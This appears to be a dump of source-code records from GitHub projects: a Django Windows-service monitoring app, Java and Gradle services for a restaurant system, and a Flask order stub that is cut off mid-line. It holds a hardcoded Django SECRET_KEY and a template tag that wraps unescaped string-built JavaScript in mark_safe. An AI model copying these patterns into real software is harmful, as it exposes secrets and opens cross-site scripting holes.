mark_safe\n\nregister = template.Library()\n\ndef jsify_list(python_list):\n assert type(python_list) == list\n\n r = '['\n for i, entry in enumerate(python_list):\n if type(entry) == int:\n e = str(entry)\n else:\n e = '\"' + entry + '\"'\n if i+1 != len(python_list):\n e += ', '\n r += e\n r += ']'\n\n return mark_safe(r)\n\[email protected]_tag('chartjs/line_chart.html')\ndef line_chart(canvas_id, chart_config=None, width='400', height='400'):\n if chart_config is None:\n raise template.TemplateSyntaxError('chart_config argument must be provided and not None')\n\n return {\n 'canvas_id': canvas_id,\n 'canvas_width': width,\n 'canvas_height': height,\n 'labels': jsify_list(chart_config['xaxis']),\n 'dataset': jsify_list(chart_config['dataset']),\n }\n" }, { "alpha_fraction": 0.5877437591552734, "alphanum_fraction": 0.6169916391372681, "avg_line_length": 26.615385055541992, "blob_id": "2ef4118cd9fc76e4b621095bbfdae83b39869eb1", "content_id": 
"92088c4483e1f054d3ad7674a6f82f3393e3c2da", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 718, "license_type": "no_license", "max_line_length": 77, "num_lines": 26, "path": "/vilicus/local_settings.py", "repo_name": "sjkingo/vilicus", "src_encoding": "UTF-8", "text": "# Django local site-specific settings for vilicus project.\n\nDEBUG = True\n\nADMINS = (\n # ('Your Name', '[email protected]'),\n)\n\nDATABASES = {\n 'default': {\n 'ENGINE': 'django.db.backends.postgresql_psycopg2',\n 'NAME': '',\n 'USER': '',\n 'PASSWORD': '',\n 'HOST': '', # leave blank\n 'PORT': '', # leave blank\n }\n}\n\n# Hosts/domain names that are valid for this site; required if DEBUG is False\n# See https://docs.djangoproject.com/en/1.5/ref/settings/#allowed-hosts\n# If DEBUG is True, localhost will automatically be added to this list.\nALLOWED_HOSTS = []\n\n# Make this unique, and don't share it with anybody.\nSECRET_KEY = '6x78*0ze892of8f+=mo8ce8cg9!e#r5_v45oz2=6$j_v)=0i0d'\n" }, { "alpha_fraction": 0.6612244844436646, "alphanum_fraction": 0.6714285612106323, "avg_line_length": 24.789474487304688, "blob_id": "37d5aa9f0a485b897b9003a3606d196260825fdb", "content_id": "b30198b13bc91781b4c5370e25ad58b356a30583", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 490, "license_type": "no_license", "max_line_length": 84, "num_lines": 19, "path": "/notify_pushover/send.py", "repo_name": "sjkingo/vilicus", "src_encoding": "UTF-8", "text": "import pushover\nfrom . 
import TOKEN_KEY\npushover.init(TOKEN_KEY)\n\nfrom models import PushoverUserTokens\n\n# from https://pushover.net/api#priority\nPRIORITY = {\n 'LOWEST': -2,\n 'LOW': -1,\n 'NORMAL': 0,\n 'HIGH': 1,\n 'EMERGENCY': 2,\n}\n\ndef send_push_notification(title, msg, priority=PRIORITY['NORMAL']):\n for t in PushoverUserTokens.objects.all():\n client = pushover.Client(t.token)\n client.send_message(msg, title='Vilicus alert: ' + title, priority=priority)\n" }, { "alpha_fraction": 0.6155669689178467, "alphanum_fraction": 0.6246542930603027, "avg_line_length": 31.87013053894043, "blob_id": "942cf27e0aa2efd0578601974bc0d1d73d8cfaf7", "content_id": "f9a4c86e3583ce4d58bbd9da82f81ce93a6d0b94", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5062, "license_type": "no_license", "max_line_length": 103, "num_lines": 154, "path": "/manager/models.py", "repo_name": "sjkingo/vilicus", "src_encoding": "UTF-8", "text": "import datetime\nfrom django.db import models\n\nclass Agent(models.Model):\n hostname = models.CharField(max_length=100)\n check_interval_ms = models.IntegerField(verbose_name='Check interval (ms)')\n last_checkin = models.DateTimeField(blank=True, null=True)\n version = models.CharField(max_length=5, blank=True, null=True)\n guid = models.CharField(max_length=40, blank=True, null=True)\n\n class Meta:\n verbose_name = 'Agent'\n verbose_name_plural = verbose_name + 's'\n ordering = ('hostname',)\n\n def __unicode__(self):\n return self.hostname\n\n @property\n def windows_services_shown(self):\n return self.windows_services.filter(hidden=False)\n\n @property\n def perflog_last_24hrs(self):\n then = datetime.datetime.now() - datetime.timedelta(days=1)\n return self.perflogs.filter(timestamp__gte=then)\n\n @property\n def perflog_id(self):\n return 'perflog_%d' % self.id\n\n @property\n def perflog_dataset(self):\n dataset = sorted([(entry.timestamp.strftime('%H:%M:%S'), entry.cpu_usage) \n for entry in 
self.perflog_last_24hrs], key=lambda x: x[0])\n labels = []\n keys = [v[0] for v in dataset]\n interval = int(len(keys) / PerformanceLogEntry.MAJOR_TICK_INTERVAL)\n if interval == 0:\n # not enough data\n return None\n for i, k in enumerate(keys):\n if i % interval == 0:\n labels.append(dataset[i][0][:-3])\n else:\n labels.append('')\n\n return {\n 'xaxis': labels,\n 'dataset': [x[1] for x in dataset]\n }\n\n# From http://msdn.microsoft.com/en-us/library/windows/desktop/ee126211(v=vs.85).aspx\nSERVICE_STATUS_STATES = (\n ('START_PENDING', 'Start pending'),\n ('RUNNING', 'Running'),\n ('STOP_PENDING', 'Stop pending'),\n ('STOPPED', 'Stopped'),\n ('PAUSE_PENDING', 'Pause pending'),\n ('PAUSED', 'Paused'),\n ('CONTINUE_PENDING', 'Continue pending'),\n ('NOT_INSTALLED', 'Not installed'),\n ('UNKNOWN', 'Unknown'),\n)\nSERVICE_STATUS_DICT = dict(SERVICE_STATUS_STATES)\n\nclass WindowsService(models.Model):\n agent = models.ForeignKey('Agent', related_name='windows_services')\n description = models.CharField(max_length=100)\n service_name = models.CharField(max_length=100)\n expected_status = models.CharField(max_length=16, \n choices=SERVICE_STATUS_STATES, default='RUNNING')\n hidden = models.BooleanField(default=False)\n\n class Meta:\n verbose_name = 'Windows Service'\n verbose_name_plural = verbose_name + 's'\n ordering = ('agent', 'description', 'service_name')\n\n def __unicode__(self):\n if self.description == self.service_name:\n return self.description\n else:\n return '{self.description} ({self.service_name})'.format(self=self)\n\n @property\n def latest_log_entries(self):\n return self.log.all()[:10]\n\n @property\n def latest_log(self):\n try:\n return self.latest_log_entries[0]\n except IndexError:\n return None\n\n @property\n def changed_since_last(self):\n try:\n if self.latest_log_entries[0].actual_status != \\\n self.latest_log_entries[1].actual_status:\n return True\n except IndexError:\n return True\n return False\n\nclass 
WindowsServiceLog(models.Model):\n service = models.ForeignKey('WindowsService', related_name='log')\n timestamp = models.DateTimeField()\n expected_status = models.CharField(max_length=16)\n actual_status = models.CharField(max_length=16)\n action_taken = models.CharField(max_length=50)\n comments = models.TextField(blank=True, null=True)\n\n class Meta:\n verbose_name = 'Windows Service log'\n verbose_name_plural = verbose_name + 's'\n ordering = ('service', '-timestamp')\n\n def __unicode__(self):\n return '{service} at {timestamp}'.format(service=str(self.service), \n timestamp=self.timestamp)\n\n @property\n def status_pass(self):\n return self.actual_status == self.expected_status\n\n @property\n def expected_status_h(self):\n return SERVICE_STATUS_DICT[self.expected_status]\n\n @property\n def actual_status_h(self):\n return SERVICE_STATUS_DICT[self.actual_status]\n\nclass PerformanceLogEntry(models.Model):\n agent = models.ForeignKey('Agent', related_name='perflogs')\n timestamp = models.DateTimeField()\n cpu_usage = models.IntegerField()\n\n # Interval for x-axis in charts. 
Note there must be this many entries before the graph will appear.\n MAJOR_TICK_INTERVAL = 6\n\n class Meta:\n verbose_name = 'Performance log entry'\n verbose_name_plural = 'Performance log entries'\n ordering = ('agent', '-timestamp')\n\n def __unicode__(self):\n return '{agent} at {timestamp}'.format(agent=str(self.agent), timestamp=self.timestamp)\n\n @property\n def hourmins(self):\n return self.timestamp.strftime('H:M')\n" }, { "alpha_fraction": 0.5300185084342957, "alphanum_fraction": 0.5355725884437561, "avg_line_length": 46.26250076293945, "blob_id": "d706c21e915fbd584b2cc949663e8e84df715682", "content_id": "55d44f30f0a42e9ead6546a35f26bfb9a06f6e26", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3781, "license_type": "no_license", "max_line_length": 395, "num_lines": 80, "path": "/manager/migrations/0001_initial.py", "repo_name": "sjkingo/vilicus", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ]\n\n operations = [\n migrations.CreateModel(\n name='Agent',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('hostname', models.CharField(max_length=100)),\n ('check_interval_ms', models.IntegerField(verbose_name=b'Check interval (ms)')),\n ('last_checkin', models.DateTimeField(null=True, blank=True)),\n ('version', models.CharField(max_length=5, null=True, blank=True)),\n ('guid', models.CharField(max_length=40, null=True, blank=True)),\n ],\n options={\n 'ordering': ('hostname',),\n 'verbose_name': 'Agent',\n 'verbose_name_plural': 'Agents',\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='PerformanceLogEntry',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('timestamp', 
models.DateTimeField()),\n ('cpu_usage', models.IntegerField()),\n ('agent', models.ForeignKey(related_name='perflogs', to='manager.Agent')),\n ],\n options={\n 'ordering': ('agent', '-timestamp'),\n 'verbose_name': 'Performance log entry',\n 'verbose_name_plural': 'Performance log entries',\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='WindowsService',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('description', models.CharField(max_length=100)),\n ('service_name', models.CharField(max_length=100)),\n ('expected_status', models.CharField(default=b'RUNNING', max_length=16, choices=[(b'START_PENDING', b'Start pending'), (b'RUNNING', b'Running'), (b'STOP_PENDING', b'Stop pending'), (b'STOPPED', b'Stopped'), (b'PAUSE_PENDING', b'Pause pending'), (b'PAUSED', b'Paused'), (b'CONTINUE_PENDING', b'Continue pending'), (b'NOT_INSTALLED', b'Not installed'), (b'UNKNOWN', b'Unknown')])),\n ('hidden', models.BooleanField()),\n ('agent', models.ForeignKey(related_name='windows_services', to='manager.Agent')),\n ],\n options={\n 'ordering': ('agent', 'description', 'service_name'),\n 'verbose_name': 'Windows Service',\n 'verbose_name_plural': 'Windows Services',\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='WindowsServiceLog',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('timestamp', models.DateTimeField()),\n ('expected_status', models.CharField(max_length=16)),\n ('actual_status', models.CharField(max_length=16)),\n ('action_taken', models.CharField(max_length=50)),\n ('comments', models.TextField(null=True, blank=True)),\n ('service', models.ForeignKey(related_name='log', to='manager.WindowsService')),\n ],\n options={\n 'ordering': ('service', '-timestamp'),\n 'verbose_name': 'Windows Service log',\n 'verbose_name_plural': 'Windows Service logs',\n },\n bases=(models.Model,),\n ),\n ]\n" }, { 
"alpha_fraction": 0.8399999737739563, "alphanum_fraction": 0.8399999737739563, "avg_line_length": 11.5, "blob_id": "d967c318bcd266b1b6336cfc259a0947c7791c65", "content_id": "1bc3c2fe7f8335576fabf0adf9ac211415b67af2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Text", "length_bytes": 25, "license_type": "no_license", "max_line_length": 13, "num_lines": 2, "path": "/lib-requirements.txt", "repo_name": "sjkingo/vilicus", "src_encoding": "UTF-8", "text": "lxml-devel\nlibxslt-devel\n" }, { "alpha_fraction": 0.7798013091087341, "alphanum_fraction": 0.7798013091087341, "avg_line_length": 30.789474487304688, "blob_id": "b4b9658e1761e04cbb2864b448bf885290b34c24", "content_id": "e6e94dedfa09b397565c3a74544e5a7609752965", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 604, "license_type": "no_license", "max_line_length": 79, "num_lines": 19, "path": "/manager/admin.py", "repo_name": "sjkingo/vilicus", "src_encoding": "UTF-8", "text": "from django.contrib import admin\n\nfrom manager.models import *\n\nclass AgentAdmin(admin.ModelAdmin):\n readonly_fields = ('last_checkin', 'version', 'guid')\n\nadmin.site.register(Agent, AgentAdmin)\n\nadmin.site.register(WindowsService)\n\nclass WindowsServiceLogAdmin(admin.ModelAdmin):\n readonly_fields = ('service', 'timestamp', 'actual_status', 'action_taken')\n\nadmin.site.register(WindowsServiceLog, WindowsServiceLogAdmin)\n\nclass PerformanceLogEntryAdmin(admin.ModelAdmin):\n readonly_fields = ('agent', 'timestamp', 'cpu_usage')\nadmin.site.register(PerformanceLogEntry, PerformanceLogEntryAdmin)\n" } ]
19
Kadek/ProjektowanieOprogramowania
https://github.com/Kadek/ProjektowanieOprogramowania
63b7d48201992a19ef68f16021c2ac983bc4de6f
9645587ab41b1ac88fae21563e813d241c63d243
c3f749c35ffa364d3fff47b4befcd47017a8a369
refs/heads/master
2020-04-03T07:32:18.074690
2018-12-08T20:48:08
2018-12-08T20:48:08
155,105,641
0
0
null
2018-10-28T19:06:10
2018-10-28T19:06:12
2018-10-28T20:17:53
Python
[ { "alpha_fraction": 0.6540880799293518, "alphanum_fraction": 0.6540880799293518, "avg_line_length": 17.875, "blob_id": "0cb6f070ab89a019d6d20f5876d1873d33453956", "content_id": "48e88a4494d399dbb31ce2fed8b697034ead6197", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 318, "license_type": "no_license", "max_line_length": 79, "num_lines": 16, "path": "/platnosci/platnosci/src/main/java/platnosci/Entity/PaymentMethods.java", "repo_name": "Kadek/ProjektowanieOprogramowania", "src_encoding": "UTF-8", "text": "/*\r\n * To change this license header, choose License Headers in Project Properties.\r\n * To change this template file, choose Tools | Templates\r\n * and open the template in the editor.\r\n */\r\npackage platnosci.Entity;\r\n\r\n/**\r\n *\r\n * @author adas\r\n */\r\npublic enum PaymentMethods {\r\n BLIK,\r\n CARD,\r\n PRZELEW\r\n}\r\n" }, { "alpha_fraction": 0.75, "alphanum_fraction": 0.75, "avg_line_length": 34, "blob_id": "974384b7b94214e7079a2c7436bc1cf0513474e4", "content_id": "813529c9f6feb1491e7236600c031177abce9e05", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Gradle", "length_bytes": 36, "license_type": "no_license", "max_line_length": 34, "num_lines": 1, "path": "/baza_personel/baza_personel/settings.gradle", "repo_name": "Kadek/ProjektowanieOprogramowania", "src_encoding": "UTF-8", "text": "rootProject.name = 'baza_personel'\r\n" }, { "alpha_fraction": 0.6407284736633301, "alphanum_fraction": 0.6622516512870789, "avg_line_length": 23.70212745666504, "blob_id": "e0f7b2790ce91ba9cbbebb8da6e1ec3c0dd2d558", "content_id": "4a30567583afb81d808601472e89c0b3ae8da9a6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Gradle", "length_bytes": 1208, "license_type": "no_license", "max_line_length": 85, "num_lines": 47, "path": "/baza_personel/baza_personel/build.gradle", "repo_name": "Kadek/ProjektowanieOprogramowania", "src_encoding": 
"UTF-8", "text": "import org.gradle.api.artifacts.*\r\n\r\nbuildscript {\r\n repositories {\r\n mavenCentral()\r\n }\r\n dependencies {\r\n classpath(\"org.springframework.boot:spring-boot-gradle-plugin:2.0.3.RELEASE\")\r\n }\r\n}\r\n\r\napply plugin: 'application'\r\nmainClassName = 'baza_personel.Application'\r\n\r\napply plugin: 'java'\r\napply plugin: 'org.springframework.boot'\r\napply plugin: 'io.spring.dependency-management'\r\n\r\nbootJar {\r\n baseName = 'gs-rest-service'\r\n version = '0.1.0'\r\n}\r\n\r\nrepositories {\r\n mavenCentral()\r\n}\r\n\r\nsourceCompatibility = 1.8\r\ntargetCompatibility = 1.8\r\n\r\next {\r\n logbackVersion = '1.2.3'\r\n junitVersion = '4.12'\r\n}\r\ndependencies {\r\n compile(\"org.springframework.boot:spring-boot-starter-web\")\r\n testCompile('org.springframework.boot:spring-boot-starter-test')\r\n \r\n compile \"ch.qos.logback:logback-core:$logbackVersion\",\r\n \"ch.qos.logback:logback-classic:$logbackVersion\"\r\n testCompile \"junit:junit:$junitVersion\"\r\n \r\n compile group: 'io.springfox', name: 'springfox-swagger2', version: '2.9.2'\r\n compile group: 'io.springfox', name: 'springfox-swagger-ui', version: '2.0.2'\r\n \r\n implementation 'com.google.code.gson:gson:2.8.5'\r\n}\r\n" }, { "alpha_fraction": 0.6547619104385376, "alphanum_fraction": 0.6547619104385376, "avg_line_length": 19.5, "blob_id": "c441e7905bfbb0853e1235b8a2581330dee2aab6", "content_id": "dfcbd24c6a0036e67c2e673eba58efc813f07aa4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "TypeScript", "length_bytes": 84, "license_type": "no_license", "max_line_length": 25, "num_lines": 4, "path": "/ui-menadzera-sieci/src/app/models/Restaurant.ts", "repo_name": "Kadek/ProjektowanieOprogramowania", "src_encoding": "UTF-8", "text": "export class Restaurant {\r\n public nazwa: string;\r\n public adres: string;\r\n }" }, { "alpha_fraction": 0.6689537167549133, "alphanum_fraction": 0.6700971722602844, "avg_line_length": 
33.693878173828125, "blob_id": "7395e6a08002fe9a4f230f101233ad5fbb8a6ec4", "content_id": "65f3e7c6e77ff5cd6e1e9db1903df18c75e36457", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 1753, "license_type": "no_license", "max_line_length": 116, "num_lines": 49, "path": "/zarzadzanie_personelem/zarzadzanie_personelem/src/main/java/zarzadzanie_personelem/Entity/EmployeeOfferCreator.java", "repo_name": "Kadek/ProjektowanieOprogramowania", "src_encoding": "UTF-8", "text": "/*\r\n * To change this license header, choose License Headers in Project Properties.\r\n * To change this template file, choose Tools | Templates\r\n * and open the template in the editor.\r\n */\r\npackage zarzadzanie_personelem.Entity;\r\n\r\nimport com.google.gson.Gson;\r\nimport java.util.HashMap;\r\nimport org.slf4j.Logger;\r\nimport org.slf4j.LoggerFactory;\r\nimport org.springframework.web.client.RestTemplate;\r\nimport utils.EasyCache;\r\n\r\n/**\r\n *\r\n * @author adas\r\n */\r\npublic class EmployeeOfferCreator {\r\n \r\n private static final Logger log = LoggerFactory.getLogger(EmployeeOfferCreator.class);\r\n\r\n public String createEmployeeOffer(final String employeeOfferFormJson, final String url) {\r\n log.info(\"Transforming json to object\");\r\n EmployeeOfferForm employeeOfferForm = (new Gson()).fromJson(employeeOfferFormJson, EmployeeOfferForm.class);\r\n log.info(\"Validating received form\");\r\n employeeOfferForm.validate();\r\n if(employeeOfferForm.isValid()){\r\n log.info(\"Saving to cache\");\r\n String message = saveEmployeeOfferToCache(employeeOfferForm);\r\n log.info(\"Saved to cache\");\r\n return new Gson().toJson(message);\r\n }else{\r\n return (new Gson()).toJson(\"Nie udało się!\");\r\n }\r\n }\r\n \r\n private String saveEmployeeOfferToCache(final EmployeeOfferForm employeeOfferForm) {\r\n log.info((new Gson()).toJson(EasyCache.getAllElements()));\r\n EasyCache.addElement(employeeOfferForm);\r\n log.info((new 
Gson()).toJson(EasyCache.getAllElements()));\r\n return \"Udało się!\";\r\n }\r\n \r\n public String getEmployeeOffers(final String url) {\r\n return (new Gson()).toJson(EasyCache.getAllElements());\r\n }\r\n \r\n}\r\n" }, { "alpha_fraction": 0.6358839273452759, "alphanum_fraction": 0.636939287185669, "avg_line_length": 29.58333396911621, "blob_id": "44070c52b7e12c0266c9ede145a4d84bf49366ee", "content_id": "9de68e7b03d1439101a88e2cb5adeced58d9b94d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 1895, "license_type": "no_license", "max_line_length": 84, "num_lines": 60, "path": "/bank_back/src/main/java/bank_back/Controller/BankController.java", "repo_name": "Kadek/ProjektowanieOprogramowania", "src_encoding": "UTF-8", "text": "package bank_back.Controller;\r\n\r\nimport bank_back.Entity.BankConnector;\r\nimport org.slf4j.Logger;\r\nimport org.slf4j.LoggerFactory;\r\nimport org.springframework.beans.factory.annotation.Autowired;\r\nimport org.springframework.core.env.Environment;\r\nimport org.springframework.web.bind.annotation.CrossOrigin;\r\nimport org.springframework.web.bind.annotation.GetMapping;\r\nimport org.springframework.web.bind.annotation.RestController;\r\nimport org.springframework.web.bind.annotation.PostMapping;\r\nimport org.springframework.web.bind.annotation.RequestBody;\r\nimport org.springframework.web.bind.annotation.RequestParam;\r\n\r\n@RestController\r\npublic class BankController {\r\n \r\n @Autowired\r\n private Environment env;\r\n \r\n private static final Logger log = LoggerFactory.getLogger(BankController.class);\r\n \r\n @CrossOrigin\r\n @GetMapping(\"/success\")\r\n public String success(\r\n @RequestParam String id) \r\n {\r\n try{\r\n log.info(\"Received success request from id {}\", id);\r\n return (new BankConnector()).success(id, env);\r\n }catch(Exception e){\r\n return e.toString();\r\n }\r\n }\r\n \r\n @CrossOrigin\r\n @GetMapping(\"/failure\")\r\n public String 
failure(\r\n @RequestParam String id) \r\n {\r\n try{\r\n log.info(\"Received failure request from id {}\", id);\r\n return (new BankConnector()).failure(id, env);\r\n }catch(Exception e){\r\n return e.toString();\r\n }\r\n }\r\n \r\n @PostMapping(\"/startPayment\")\r\n public String startPayment(\r\n @RequestBody String paymentJson) \r\n {\r\n try{\r\n log.info(\"Received start payment request for payment {}\", paymentJson);\r\n return (new BankConnector()).startPayment(paymentJson, env);\r\n }catch(Exception e){\r\n return e.toString();\r\n }\r\n }\r\n}\r\n" }, { "alpha_fraction": 0.6236686110496521, "alphanum_fraction": 0.6852071285247803, "avg_line_length": 20.236841201782227, "blob_id": "69c04e762c743a561636cd055b928794e079b65f", "content_id": "f2059ba68aabffe0cefc9abb1d0e7f78345ee95c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 856, "license_type": "no_license", "max_line_length": 79, "num_lines": 38, "path": "/README.md", "repo_name": "Kadek/ProjektowanieOprogramowania", "src_encoding": "UTF-8", "text": "# ProjektowanieOprogramowania\r\n\r\nNasz projekt na studia - wrzucamy kod do swoich branchy ;)\r\n\r\n\r\nHOW TO RUN!!!!:\r\n\r\n-java i gradle:\r\n1. Wchodzimy do folderu.\r\n2. gradlew build\r\n3. gradlew run\r\n\r\n-angular:\r\n1. Wchodzimy do folderu.\r\n2. npm install\r\n3. ng serve --port=\"wolny numer portu\"\r\n\r\n\r\nPORTY:\r\n\r\n zarzadzanie_personelem = 9090\r\n baza_personel = 9091\r\n platnosci = 9092\r\n bank = 9093\r\n zarzadzanie_siecia = 9094\r\n baza_zarzadzanie_siecia = 9095\r\n\r\n platnosci_gui = 4200\r\n ui_menadzera_sieci = 4201\r\n ui_menadzera_restauracji = 4202\r\n recruitment_simulation = 4203\r\n payment_simulation = 4042\r\n\r\nPROBLEMY Z DEPLOYMENTEM:\r\n\r\n- gradle nie znajduje czegoś .jar\r\n1. Dodaj zmienną środowiskową JAVA_HOME, która wskazuje ścieżkę do Twojego jdk.\r\n2. 
Rozszerz zmienną PATH o treść \"%JAVA_HOME%\\bin;\" (dla Windowsa)\r\n" }, { "alpha_fraction": 0.6601467132568359, "alphanum_fraction": 0.6625916957855225, "avg_line_length": 27.214284896850586, "blob_id": "e296f7f499365581a25ff531024e31bc3555b8a0", "content_id": "347a305420a51a5979cbd7434ce67ee317c31370", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 818, "license_type": "no_license", "max_line_length": 81, "num_lines": 28, "path": "/platnosci/platnosci/src/main/java/platnosci/Entity/MockPayment.java", "repo_name": "Kadek/ProjektowanieOprogramowania", "src_encoding": "UTF-8", "text": "package platnosci.Entity;\r\n\r\nimport org.slf4j.Logger;\r\nimport org.slf4j.LoggerFactory;\r\nimport org.springframework.web.client.RestTemplate;\r\n\r\npublic class MockPayment extends PaymentAbstract{\r\n \r\n private static final Logger log = LoggerFactory.getLogger(MockPayment.class);\r\n \r\n public MockPayment(final String url){\r\n super(url);\r\n }\r\n\r\n @Override\r\n public String pay(final PaymentForm paymentForm) {\r\n if(paymentForm.isValid()){\r\n return getPaymentRedirect(paymentForm);\r\n }else{\r\n return \"Invalid input\";\r\n }\r\n } \r\n \r\n private String getPaymentRedirect(final PaymentForm paymentForm){\r\n RestTemplate restTemplate = new RestTemplate();\r\n return restTemplate.postForObject(url, paymentForm, String.class); \r\n }\r\n}\r\n" }, { "alpha_fraction": 0.6947368383407593, "alphanum_fraction": 0.7789473533630371, "avg_line_length": 17.399999618530273, "blob_id": "a11b337252885f7f792145f09c8aa9a441f7f5de", "content_id": "1417b95a85244b6574ae7e7ee7aca8728a1d0ac4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "INI", "length_bytes": 95, "license_type": "no_license", "max_line_length": 55, "num_lines": 5, "path": "/platnosci/platnosci/src/main/resources/application.properties", "repo_name": "Kadek/ProjektowanieOprogramowania", "src_encoding": "UTF-8", "text": 
"server.port=9092\r\n\r\nmockPaymentAddress = http://localhost:9093/startPayment\r\n\r\nconfig = nonprod" }, { "alpha_fraction": 0.518406331539154, "alphanum_fraction": 0.5371913313865662, "avg_line_length": 29.845794677734375, "blob_id": "5317209eddba3212a1e70cc05858ac9eeb4834e2", "content_id": "8745a90facf8de869bad751a2425b6d00e9d58eb", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6604, "license_type": "no_license", "max_line_length": 143, "num_lines": 214, "path": "/zaslepki_baz_danych/oddzielnie/zamowienia.py", "repo_name": "Kadek/ProjektowanieOprogramowania", "src_encoding": "UTF-8", "text": "from flask import Flask, request, jsonify\nimport datetime\n\napp = Flask(__name__)\n\n\[email protected]('/')\ndef main_site():\n return 404\n\n\nlista_zamowien = {\n 'lista_zamowien': [\n {\n 'id_zamowienia': 1,\n 'id_klienta': 1,\n 'id_restauracji': 1,\n 'lista_dan': [\n {'id_dania': 1, 'nazwa': 'Kawa'},\n {'id_dania': 2, 'nazwa': 'Ciastko'},\n {'id_dania': 3, 'nazwa': 'Bulka'}\n ],\n 'kwota': 26.88,\n 'status': 'oczekujace',\n 'data_zlozenia': '2018-09-10',\n 'ocena': '2/10',\n 'adres': \"Grunwaldzka 13\"\n },\n {\n 'id_zamowienia': 2,\n 'id_klienta': 2,\n 'id_restauracji': 3,\n 'lista_dan': [\n {'id_dania': 1, 'nazwa': 'Kawa'},\n {'id_dania': 2, 'nazwa': 'Ciastko'},\n {'id_dania': 3, 'nazwa': 'Bulka'}\n ],\n 'kwota': 59.88,\n 'status': 'przygotowywane',\n 'data_zlozenia': '2018-06-11',\n 'ocena': '4/10',\n 'adres': \"Wolności 15\"\n\n },\n {\n 'id_zamowienia': 3,\n 'id_klienta': 1,\n 'id_restauracji': 5,\n 'lista_dan': [\n {'id_dania': 1, 'nazwa': 'Kawa'},\n {'id_dania': 2, 'nazwa': 'Ciastko'},\n {'id_dania': 3, 'nazwa': 'Bulka'}\n ],\n 'kwota': 43.80,\n 'status': 'w_drodze',\n 'data_zlozenia': '2018-12-16',\n 'ocena': '8/10',\n 'adres': \"Alternatywy 4\"\n\n }\n ]\n}\nzamowienia_interator = 4\n\n\[email protected]('/dodaj_zamowienie_Z', methods=['POST'])\ndef dodaj_zamowienie_Z():\n try:\n rrequest = 
request.get_json()\n if rrequest['id_klienta'] is None:\n resp = jsonify(success=False)\n resp.status_code = 404\n return resp\n id_klienta = int(rrequest['id_klienta'])\n\n if rrequest['id_restauracji'] is None:\n resp = jsonify(success=False)\n resp.status_code = 404\n return resp\n id_restauracji = int(rrequest['id_restauracji'])\n\n if rrequest['lista_dan'] is None:\n resp = jsonify(success=False)\n resp.status_code = 404\n return resp\n lista_dan = rrequest['lista_dan']\n\n if rrequest['kwota'] is None:\n resp = jsonify(success=False)\n resp.status_code = 404\n return resp\n kwota = float(rrequest['kwota'])\n except KeyError:\n resp = jsonify(success=False)\n resp.status_code = 404\n return resp\n\n global zamowienia_interator\n zamowienia_interator +=1\n lista_zamowien['lista_zamowien'].append({\n 'id_zamowienia': zamowienia_interator,\n 'lista_dan': lista_dan,\n 'id_restauracji': id_restauracji,\n 'id_klienta': id_klienta,\n 'kwota': kwota,\n 'status': 'oczekujące',\n 'data_zlozenia': str(datetime.datetime.today().strftime('%Y-%m-%d'))\n })\n print(lista_zamowien)\n resp = jsonify(success=True)\n resp.status_code = 200\n return resp\n\n\n# Edytuj_zamowienie(id_zamowienia:int, lista[id_dania:int,nazwa:string],kwota:double)\[email protected]('/edytuj_zamowienie_Z', methods=['POST'])\ndef edytuj_zamowienie_Z():\n rrequest = request.get_json()\n try:\n if rrequest[\"id_zamowienia\"] is None:\n resp = jsonify(success=False)\n resp.status_code = 404\n return resp\n except KeyError:\n resp = jsonify(success=False)\n resp.status_code = 404\n return resp\n\n try:\n if rrequest[\"lista_dan\"]:\n for zamowienie in lista_zamowien['lista_zamowien']:\n if zamowienie['id_zamowienia'] == int(rrequest['id_zamowienia']):\n zamowienie['lista_dan'] = str(rrequest['lista_dan'])\n except KeyError:\n pass\n\n try:\n if rrequest[\"kwota\"]:\n for zamowienie in lista_zamowien['lista_zamowien']:\n if zamowienie['id_zamowienia'] == int(rrequest['id_zamowienia']):\n zamowienie['cena'] 
